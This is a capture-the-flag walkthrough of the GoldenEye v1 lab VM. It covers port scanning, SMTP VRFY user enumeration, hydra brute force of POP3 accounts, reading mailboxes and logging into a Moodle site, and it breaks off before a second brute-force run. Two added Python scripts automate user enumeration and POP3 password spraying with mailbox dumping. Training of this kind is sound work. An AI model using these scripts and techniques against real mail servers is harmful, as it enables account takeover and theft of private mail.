************
GoldenEye v1
************

VM URL: https://www.vulnhub.com/entry/goldeneye-1,240/

IP address of GoldenEye Virtual Machine: 10.0.133.48

Initial port scans
==================

unicornscan of all TCP ports
----------------------------

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# unicornscan -I 10.0.133.47:a
    TCP open                smtp[   25]     from 10.0.133.47  ttl 64 
    TCP open                http[   80]     from 10.0.133.47  ttl 64 
    TCP open             unknown[55006]     from 10.0.133.47  ttl 64 
    TCP open             unknown[55007]     from 10.0.133.47  ttl 64 
    
Further investigation into exposed services
===========================================

SMTP on port 25
---------------

``nmap -A`` scan of port 25 (``-A`` enables OS detection (``-O``), version detection (``-sV``), default script scanning (``-sC``) and traceroute):

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 25
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 11:29 BST
    Nmap scan report for 10.0.133.48
    Host is up (0.00046s latency).

    PORT   STATE SERVICE VERSION
    25/tcp open  smtp    Postfix smtpd
    |_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
    | ssl-cert: Subject: commonName=ubuntu
    | Not valid before: 2018-04-24T03:22:34
    |_Not valid after:  2028-04-21T03:22:34
    |_ssl-date: TLS randomness does not represent time
    MAC Address: 00:1A:4A:16:01:30 (Qumranet)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.46 ms 10.0.133.48

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 30.54 seconds
    
``nmap`` identifies the SMTP server as Postfix but cannot determine its version. Connecting with ``telnet`` and probing the server by hand may reveal more from the banner, and it may be possible to enumerate user accounts with the SMTP ``VRFY`` and/or ``RCPT TO`` verbs.

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 25
    Trying 10.0.133.48...
    Connected to 10.0.133.48.
    Escape character is '^]'.
    220 ubuntu GoldentEye SMTP Electronic-Mail agent
    HELO example.com
    250 ubuntu
    VRFY root
    252 2.0.0 root
    VRFY noexist
    550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table
    
The server presents a customised banner, though it still suggests the host OS is Ubuntu. "GoldentEye" in the banner is misspelt; that may simply be a typo, but it is worth noting and adding to any wordlist used for brute forcing logins. ``VRFY root``, a user that almost certainly exists, returns ``252 2.0.0 root`` (252 means "Cannot VRFY user, but will accept message and attempt delivery"), which on its own neither confirms nor denies that the account exists. ``VRFY noexist``, however, returns ``550 5.1.1 <noexist>: Recipient address rejected: User unknown in local recipient table``. The difference between the two replies gives us a way to enumerate email (and most likely system) user accounts.

HTTP on port 80
---------------

``nmap`` scan of the service on port 80:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 80
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 12:03 BST
    Nmap scan report for 10.0.133.48
    Host is up (0.00054s latency).

    PORT   STATE SERVICE VERSION
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: GoldenEye Primary Admin Server
    MAC Address: 00:1A:4A:16:01:30 (Qumranet)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.54 ms 10.0.133.48

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds
    
The web server and its version are returned. Nikto scan of the web server:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# nikto -h http://10.0.133.48/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          10.0.133.48
    + Target Hostname:    10.0.133.48
    + Target Port:        80
    + Start Time:         2018-08-03 12:03:09 (GMT1)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.7 (Ubuntu)
    + Server leaks inodes via ETags, header found with file /, fields: 0xfc 0x56aba821be9ed 
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
    + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
    + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
    + /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
    + OSVDB-3233: /icons/README: Apache default file found.
    + 7535 requests: 0 error(s) and 9 item(s) reported on remote host
    + End Time:           2018-08-03 12:03:27 (GMT1) (18 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
Visiting the website at http://10.0.133.48/ displays an animated faux login page for the "Severnaya Auxiliary Control Station". The page source, and in turn the ``terminal.js`` script responsible for the typewriter effect, contain a comment holding an encoded password.

.. image:: ./images/goldeneye/GoldenEye_main_page.png
   :alt: goldeneye main page

.. code-block:: html

   <title>GoldenEye Primary Admin Server</title>

.. code-block:: javascript

   var data = [
     {
       GoldenEyeText: "Severnaya Auxiliary Control Station<br>****TOP SECRET ACCESS****<br>Accessing Server Identity<br>Server Name:....................<br>GOLDENEYE<br><br>User: UNKNOWN<br>Naviagate to /sev-home/ to login"
     }
   ];
   //
   //Boris, make sure you update your default password.
   //My sources say MI6 maybe planning to infiltrate.
   //Be on the lookout for any suspicious network traffic....
   //
   //I encoded you p@ssword below...
   //
   //&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
   //
   //BTW Natalya says she can break your codes
   //
   var allElements = document.getElementsByClassName("typeing");
   for (var j = 0; j < allElements.length; j++) {
     var currentElementId = allElements[j].id;
     var currentElementIdContent = data[0][currentElementId];
     var element = document.getElementById(currentElementId);
     var devTypeText = currentElementIdContent;

     // Type the text one character at a time; anything between "<" and ">"
     // is emitted in one go so a half-written HTML tag is never rendered.
     var i = 0, isTag, text;
     (function type() {
       text = devTypeText.slice(0, ++i);
       if (text === devTypeText) return;
       element.innerHTML = text + ` `;
       var char = text.slice(-1);
       if (char === "<") isTag = true;
       if (char === ">") isTag = false;
       if (isTag) return type();
       setTimeout(type, 60);
     })();
   }

The string in the comment is a run of HTML numeric character references (``&#NN;``, decimal ASCII code points). Decode it with the ``unescape`` function from Python 3's ``html`` module:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# python3
    Python 3.6.6 (default, Jun 27 2018, 14:44:17) 
    [GCC 8.1.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import html
    >>> a = '&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;'
    >>> html.unescape(a)
    'InvincibleHack3r'
    
Boris's password is learned: ``InvincibleHack3r``

The faux login teletype instructs us to navigate to http://10.0.133.48/sev-home/. This page requires authentication (HTTP basic auth); try Boris's credentials:

.. image:: ./images/goldeneye/GoldenEye_sev-home_auth.png
   :alt: goldeneye login page

.. image:: ./images/goldeneye/GoldenEye_loggedin.png
   :alt: goldeneye main page

The credentials work and we are presented with a page telling us to "Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system". The POP3 service is running on non-default ports (not 110 for POP3 or 995 for POP3S), which our initial port scan already found: 55006 and 55007.

Nikto also reported ``/splashAdmin.php`` ("Cobalt Qube 3 admin is running"). Visiting this page returns Boris's blog, which contains information that may prove useful later.

.. image:: ./images/goldeneye/GoldenEye_borisblog.png
   :alt: goldeneye boris blog page

The background is hideous and makes the text hard to read, so read the page source instead (text content only):

.. code-block:: text

   Cobalt Qube 3 has been decommissioned

   We can use this page to put up team photos, discussion, etc. Natalya is not allowed to post here though --Boris

   Here's me with my new sniper rifle.

   Boris why are you wearing shorts in that photo? You do realize you're stationed above the Arctic circle, correct?

   BTW your favorite pen broke, but I replaced it with a new special one.

   Natalya "best coder" S.

   "License to Kill - Complex Grenade Launchers - No Oddjob" - Unknown"

   Greetings ya'll! GoldenEye Admin here.

   For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag.
   I've replaced GCC with this throughout the GolenEye systems.

   Boris, no arguing about this, GCC has been removed and that's final!

   Also why have you been chatting with Xenia in private Boris? She's a new contractor that you've never met before? Are you sure you've never worked together...?

   -Admin

   Janus was here

From this page and the others discovered so far we can build a list of possible users on the server: Boris, Natalya, Oddjob, Admin, Xenia and Janus. The line about replacing GCC with "the Alternative to GCC, which FreeBSD uses" (Clang) is also noteworthy.

POP3S on port 55006
-------------------

``nmap`` scan of POP3 on port 55006:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55006
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
    Nmap scan report for 10.0.133.48
    Host is up (0.00054s latency).

    PORT      STATE SERVICE  VERSION
    55006/tcp open  ssl/pop3 Dovecot pop3d
    |_pop3-capabilities: UIDL AUTH-RESP-CODE CAPA USER PIPELINING TOP SASL(PLAIN) RESP-CODES
    | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
    | Not valid before: 2018-04-24T03:23:52
    |_Not valid after:  2028-04-23T03:23:52
    |_ssl-date: TLS randomness does not represent time
    MAC Address: 00:1A:4A:16:01:30 (Qumranet)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.54 ms 10.0.133.48

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds
    
The server listening on port 55006 expects an SSL/TLS session to be negotiated first, so we cannot investigate it by hand with ``telnet``. ``openssl s_client`` can connect, negotiate the encryption and then let us talk to the POP3 server with the usual verbs.

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# openssl s_client -connect 10.0.133.48:55006
    CONNECTED(00000003)
    depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
    verify error:num=18:self signed certificate
    verify return:1
    depth=0 O = Dovecot mail server, OU = localhost, CN = localhost, emailAddress = root@localhost
    verify return:1

    ... (certificate chain redacted)

    ---
    +OK GoldenEye POP3 Electronic-Mail System
    USER boris
    +OK
    PASS InvincibleHack3r
    -ERR [AUTH] Authentication failed.
    LIST
    -ERR Unknown command.
    
``nmap`` identifies the service as Dovecot pop3d but does not report a version, and nothing suggests a known, remotely exploitable weakness in it. We can connect and issue POP3 commands to try the credentials discovered so far, but they are rejected.

POP3 on port 55007
------------------

``nmap`` scan of POP3 on port 55007:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# nmap -A 10.0.133.48 -p 55007
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-03 16:44 BST
    Nmap scan report for 10.0.133.48
    Host is up (0.00065s latency).

    PORT      STATE SERVICE VERSION
    55007/tcp open  pop3    Dovecot pop3d
    |_pop3-capabilities: RESP-CODES UIDL PIPELINING TOP STLS SASL(PLAIN) CAPA USER AUTH-RESP-CODE
    | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
    | Not valid before: 2018-04-24T03:23:52
    |_Not valid after:  2028-04-23T03:23:52
    |_ssl-date: TLS randomness does not represent time
    MAC Address: 00:1A:4A:16:01:30 (Qumranet)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop

    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.65 ms 10.0.133.48

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds
    
It is very likely that the same Dovecot instance is listening on both 55006 and 55007, simply wrapping the former in TLS; this is a common mail server configuration, and the banner and capabilities reported by ``nmap`` are identical apart from ``STLS``. The POP3 service on port 55007 is unencrypted, so ``telnet`` can be used to connect and issue POP3 commands directly.

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
    Trying 10.0.133.48...
    Connected to 10.0.133.48.
    Escape character is '^]'.
    +OK GoldenEye POP3 Electronic-Mail System
    USER boris
    +OK
    PASS InvincibleHack3r
    -ERR [AUTH] Authentication failed.
    LIST
    -ERR Unknown command.
    
Since it is almost certainly the same back-end Dovecot instance, there is little point in further interaction over port 55006: it would give the same results as port 55007 with the added overhead of the TLS handshake.

Plan of attack
==============

The GNO page at /sev-home/ strongly hints that the details required to compromise the machine further can be found in users' email accounts. A list of possible users has been enumerated, along with a means (SMTP ``VRFY``) of verifying whether they have mail accounts on the server. Given that the Dovecot service offers no obvious exploit path to the mailboxes, the account passwords will most likely have to be brute forced using a wordlist of commonly used passwords, or one generated from the pages and banners discovered on GoldenEye.

Exploitation
============

Enumerate POP3 accounts
-----------------------

From the names found on http://10.0.133.48/splashAdmin.php the following list of possible user names was created:

* Boris
* Natalya
* Oddjob
* Admin
* Xenia
* Janus

Run ``smtp-user-enum`` to discover which of these users have mail accounts on the server:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -U users.txt -t 10.0.133.48
    Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

     ----------------------------------------------------------
    |                   Scan Information                       |
     ----------------------------------------------------------

    Mode ..................... VRFY
    Worker Processes ......... 5
    Usernames file ........... users.txt
    Target count ............. 1
    Username count ........... 6
    Target TCP port .......... 25
    Query timeout ............ 5 secs
    Target domain ............ 

    ######## Scan started at Tue Aug  7 15:40:09 2018 #########
    10.0.133.48: Natalya exists
    10.0.133.48: Boris exists
    ######## Scan completed at Tue Aug  7 15:40:09 2018 #########
    2 results.

    6 queries in 1 seconds (6.0 queries / sec)

    Script done on 2018-08-07 15:40:11+01:00
    
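The VRFY enumeration above (the 252-versus-550 split seen in the manual ``telnet`` session and automated by ``smtp-user-enum``) as a small Python script. This is an added example, not part of the original walkthrough or of ``smtp-user-enum``: it uses the standard ``smtplib.SMTP.verify`` call, and ships with a constructed Postfix-like responder (``_FakePostfix``, with an assumed local account set of root, boris and natalya) so it runs offline; point ``vrfy_users`` at 10.0.133.48:25 to use it against the VM. Note the control probe: a name you know is bogus must come back 550, otherwise a server that answers 252 for everything would make every candidate look valid.

```python
"""SMTP VRFY user enumeration with a built-in Postfix-like responder for offline runs."""
import smtplib
import socketserver
import threading

# Constructed fixture so the example runs without the VM: the accounts the fake
# server treats as local. Against a real target, VRFY itself is the oracle.
FAKE_LOCAL_USERS = {"root", "boris", "natalya"}


def classify_vrfy(code):
    """Map an SMTP VRFY reply code to a verdict.

    Postfix never says 250 'user found': it answers 252 for any address it is
    prepared to accept mail for and 550 'User unknown in local recipient table'
    otherwise, so the usable signal is the 2xx-versus-5xx split. 502 means
    VRFY is disabled, and anything else is treated as inconclusive."""
    if code in (250, 251, 252):
        return "exists"
    if code in (550, 551, 553):
        return "unknown"
    return "ambiguous"


def vrfy_users(host, port, users, helo="example.com", timeout=5):
    """Open one SMTP session and VRFY each candidate; returns {user: verdict}."""
    results = {}
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.helo(helo)
        for user in users:
            code, _message = smtp.verify(user)   # sends 'vrfy <user>'
            results[user] = classify_vrfy(code)
    return results


class _FakePostfix(socketserver.StreamRequestHandler):
    """Minimal stand-in that answers VRFY the way the GoldenEye Postfix did."""

    def handle(self):
        self.wfile.write(b"220 ubuntu GoldentEye SMTP Electronic-Mail agent\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self.wfile.write(b"250 ubuntu\r\n")
            elif verb == "VRFY":
                if arg.strip("<>").split("@")[0].lower() in FAKE_LOCAL_USERS:
                    self.wfile.write(f"252 2.0.0 {arg}\r\n".encode())
                else:
                    self.wfile.write(
                        f"550 5.1.1 <{arg}>: Recipient address rejected: "
                        "User unknown in local recipient table\r\n".encode())
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_postfix():
    """Serve the fake responder on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _FakePostfix)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo(users=("root", "Boris", "Natalya", "Oddjob", "noexist")):
    """Enumerate the candidate list against the fake server and return the verdicts.

    'noexist' is the control: it must come back 'unknown' for the 'exists'
    answers to mean anything."""
    server, port = start_fake_postfix()
    try:
        return vrfy_users("127.0.0.1", port, list(users))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for user, verdict in demo().items():
        print(f"{user}: {verdict}")
```

Against a real host, keep the candidate list short and the session single: Postfix logs every VRFY, and some servers rate-limit or disconnect after a burst of rejected recipients.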
Brute force users' passwords with hydra
---------------------------------------

A wordlist was first generated with ``cewl`` from all the web pages discovered so far, mutated with ``john`` and fed to ``hydra`` against the root, boris and natalya accounts, but this was not successful.

User list:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# cat users.txt 
    root
    Boris
    Natalya
    
Brute force the passwords with ``hydra`` using the fasttrack wordlist:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 16:42:39
    [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 666 login tries (l:3/p:222), ~42 tries per task
    [DATA] attacking pop3://10.0.133.48:55007/
    [STATUS] 80.00 tries/min, 80 tries in 00:01h, 586 to do in 00:08h, 16 active
    [STATUS] 64.00 tries/min, 192 tries in 00:03h, 474 to do in 00:08h, 16 active

    [55007][pop3] host: 10.0.133.48   login: Boris   password: secret1!
    [STATUS] 70.43 tries/min, 493 tries in 00:07h, 173 to do in 00:03h, 16 active
    [55007][pop3] host: 10.0.133.48   login: Natalya   password: bird
    1 of 1 target successfully completed, 2 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 16:51:19
    
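The hydra run above, together with the USER/PASS/LIST/RETR sessions used in the following sections to read each mailbox, as one Python script built on the standard ``poplib`` module. This is an added example rather than anything from the walkthrough: it talks to a constructed Dovecot-like responder (``_FakeDovecot``, with the assumed accounts boris/secret1! and natalya/bird and one made-up message each) so it runs offline; call ``spray`` and ``dump_mailbox`` with 10.0.133.48 and 55007 to use it against the VM. Like hydra it opens one connection per attempt, so a ``-ERR [AUTH]`` never leaves a half-authenticated session behind.

```python
"""POP3 password spray and mailbox retrieval with a built-in Dovecot-like responder."""
import poplib
import socketserver
import threading

# Constructed fixtures so the example runs without the VM.
FAKE_ACCOUNTS = {"boris": "secret1!", "natalya": "bird"}
FAKE_MAILBOX = {
    "boris": [b"From: root@127.0.0.1.goldeneye\r\n\r\nBoris, this is admin.\r\n"],
    "natalya": [b"From: root@ubuntu\r\n\r\nNatalya, please stop breaking boris' codes.\r\n"],
}


def try_login(host, port, user, password, timeout=5):
    """One connection per attempt, as hydra does; True only on '+OK Logged in'."""
    pop = poplib.POP3(host, port, timeout=timeout)
    try:
        pop.user(user)
        pop.pass_(password)          # raises error_proto on '-ERR [AUTH] ...'
        return True
    except poplib.error_proto:
        return False
    finally:
        try:
            pop.quit()
        except (poplib.error_proto, OSError):
            pass


def spray(host, port, users, passwords):
    """Try every password for every user; stop at the first hit per user."""
    found = {}
    for user in users:
        for password in passwords:
            if try_login(host, port, user, password):
                found[user] = password
                break
    return found


def dump_mailbox(host, port, user, password):
    """LIST, then RETR every message; returns the raw messages as strings."""
    pop = poplib.POP3(host, port, timeout=5)
    pop.user(user)
    pop.pass_(password)
    messages = []
    for entry in pop.list()[1]:          # entries look like b'1 544'
        number = int(entry.split()[0])
        lines = pop.retr(number)[1]      # poplib strips CRLF and dot-stuffing
        messages.append(b"\r\n".join(lines).decode(errors="replace"))
    pop.quit()
    return messages


class _FakeDovecot(socketserver.StreamRequestHandler):
    """Stand-in for the GoldenEye POP3 service on 55007 (constructed, not Dovecot)."""

    def handle(self):
        user, authed = None, False
        self.wfile.write(b"+OK GoldenEye POP3 Electronic-Mail System\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg.lower()
                self.wfile.write(b"+OK\r\n")
            elif verb == "PASS":
                authed = user is not None and FAKE_ACCOUNTS.get(user) == arg
                self.wfile.write(b"+OK Logged in.\r\n" if authed
                                 else b"-ERR [AUTH] Authentication failed.\r\n")
            elif verb == "LIST" and authed:
                msgs = FAKE_MAILBOX.get(user, [])
                reply = [f"+OK {len(msgs)} messages:"]
                reply += [f"{i} {len(m)}" for i, m in enumerate(msgs, 1)]
                self.wfile.write(("\r\n".join(reply) + "\r\n.\r\n").encode())
            elif verb == "RETR" and authed:
                msg = FAKE_MAILBOX[user][int(arg) - 1]
                self.wfile.write(b"+OK %d octets\r\n%s.\r\n" % (len(msg), msg))
            elif verb == "QUIT":
                self.wfile.write(b"+OK Logging out.\r\n")
                return
            else:
                self.wfile.write(b"-ERR Unknown command.\r\n")


def start_fake_dovecot():
    """Serve the fake responder on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _FakeDovecot)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def demo(users=("root", "boris", "natalya"),
         passwords=("password", "InvincibleHack3r", "secret1!", "bird")):
    """Spray, then read every mailbox that opened; returns (found, mailboxes)."""
    server, port = start_fake_dovecot()
    try:
        found = spray("127.0.0.1", port, users, passwords)
        mailboxes = {u: dump_mailbox("127.0.0.1", port, u, p) for u, p in found.items()}
        return found, mailboxes
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    found, mailboxes = demo()
    for user, password in found.items():
        print(f"[+] {user}:{password}")
        for msg in mailboxes[user]:
            print(msg)
```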
Boris's and Natalya's mailbox passwords are recovered.

Read Boris's email
------------------

Telnet to the Dovecot server, log in as boris and retrieve his mail:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
    Trying 10.0.133.48...
    Connected to 10.0.133.48.
    Escape character is '^]'.
    +OK GoldenEye POP3 Electronic-Mail System
    USER boris
    +OK
    PASS secret1!
    +OK Logged in.
    LIST
    +OK 3 messages:
    1 544
    2 373
    3 921
    .
    RETR 1
    +OK 544 octets
    Return-Path: 
    X-Original-To: boris
    Delivered-To: boris@ubuntu
    Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
    Message-Id: <20180425022326.D9E47454B1@ubuntu>
    Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
    From: root@127.0.0.1.goldeneye

    Boris, this is admin. You can electronically communicate to co-workers and students here. 
    I'm not going to scan emails for security risks because I trust you and the other admins here.
    .
    RETR 2
    +OK 373 octets
    Return-Path: 
    X-Original-To: boris
    Delivered-To: boris@ubuntu
    Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
    Message-Id: <20180425024249.C3F2B454B1@ubuntu>
    Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
    From: natalya@ubuntu

    Boris, I can break your codes!
    .
    RETR 3
    +OK 921 octets
    Return-Path: 
    X-Original-To: boris
    Delivered-To: boris@ubuntu
    Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
    Message-Id: <20180425025235.4B9F4454B1@ubuntu>
    Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
    From: alec@janus.boss

    Boris,

    Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye.
    Place them in a hidden file within the root directory of this server then remove from this email.
    There can only be one set of these acces codes, and we need to secure them for the final execution.
    If they are retrieved and captured our plan will crash and burn!

    Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

    PS - Keep security tight or we will be compromised.
    .
    QUIT
    +OK Logging out.
    Connection closed by foreign host.

No credentials are found, but there is a strong hint that other mailboxes may hold some: the admin states outright that email is not scanned for security risks, i.e. there is no DLP (Data Loss Prevention) on the mail server, and the message from Janus shows that sensitive material (the GoldenEye access codes) is being sent through it. Natalya, who claims she can break Boris's codes, is the obvious next mailbox.

Read Natalya's email
--------------------

Telnet to the Dovecot server, log in as natalya and retrieve her mail:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
    Trying 10.0.133.48...
    Escape character is '^]'.
    +OK GoldenEye POP3 Electronic-Mail System
    USER natalya
    +OK
    PASS bird
    +OK Logged in.
    LIST
    +OK 2 messages:
    1 631
    2 1048
    .
    RETR 1
    +OK 631 octets
    Return-Path: 
    X-Original-To: natalya
    Delivered-To: natalya@ubuntu
    Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
    Message-Id: <20180425024542.D5EDA454B1@ubuntu>
    Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
    From: root@ubuntu

    Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. 
    I will email you once a student is designated to you.

    Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
    .
    RETR 2
    +OK 1048 octets
    Return-Path: 
    X-Original-To: natalya
    Delivered-To: natalya@ubuntu
    Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
    Message-Id: <20180425031956.17C96454B1@ubuntu>
    Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
    From: root@ubuntu

    Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

    Ok, user creds are:

    username: xenia
    password: RCP90rulez!

    Boris verified her as a valid contractor so just create the account ok?

    And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
    **Make sure to edit your host file since you usually work remote off-network....

    Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

    .
    QUIT
    +OK Logging out.
    Connection closed by foreign host.

A new site is discovered at severnaya-station.com/gnocertdir, with instructions to edit /etc/hosts so that the domain resolves to the server's IP (10.0.133.48). The site is most likely an Apache name-based virtual host, so the request's ``Host`` header must carry the domain rather than the IP for Apache to serve the correct content.

Add domain to /etc/hosts
------------------------

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# echo "10.0.133.48 severnaya-station.com" >> /etc/hosts
    
Once the domain-to-IP mapping is in /etc/hosts we can browse to the URL

.. image:: ./images/goldeneye/GoldenEye_moodle.png
   :alt: goldeneye moodle

and log in with Xenia's credentials from Natalya's mail.

.. image:: ./images/goldeneye/GoldenEye_moodle_login_xenia.png
   :alt: goldeneye moodle login xenia

Exploring Xenia's Moodle account
--------------------------------

A message from "Dr Doak" is found; the line "If you have any questions message me via email, not here." suggests Dr Doak also has a mail account on the server.

.. image:: ./images/goldeneye/GoldenEye_moodle_doak_msg.png
   :alt: goldeneye moodle doak msg

``smtp-user-enum`` confirms that ``doak`` does indeed have a mail account:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# smtp-user-enum -u doak -t 10.0.133.48
    Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

     ----------------------------------------------------------
    |                   Scan Information                       |
     ----------------------------------------------------------

    Mode ..................... VRFY
    Worker Processes ......... 5
    Target count ............. 1
    Username count ........... 1
    Target TCP port .......... 25
    Query timeout ............ 5 secs
    Target domain ............ 

    ######## Scan started at Tue Aug  7 18:52:18 2018 #########
    10.0.133.48: doak exists
    ######## Scan completed at Tue Aug  7 18:52:18 2018 #########
    1 results.

    1 queries in 1 seconds (1.0 queries / sec)
    
Brute force doak's POP3 password with ``hydra`` and the fasttrack wordlist:

.. raw:: html

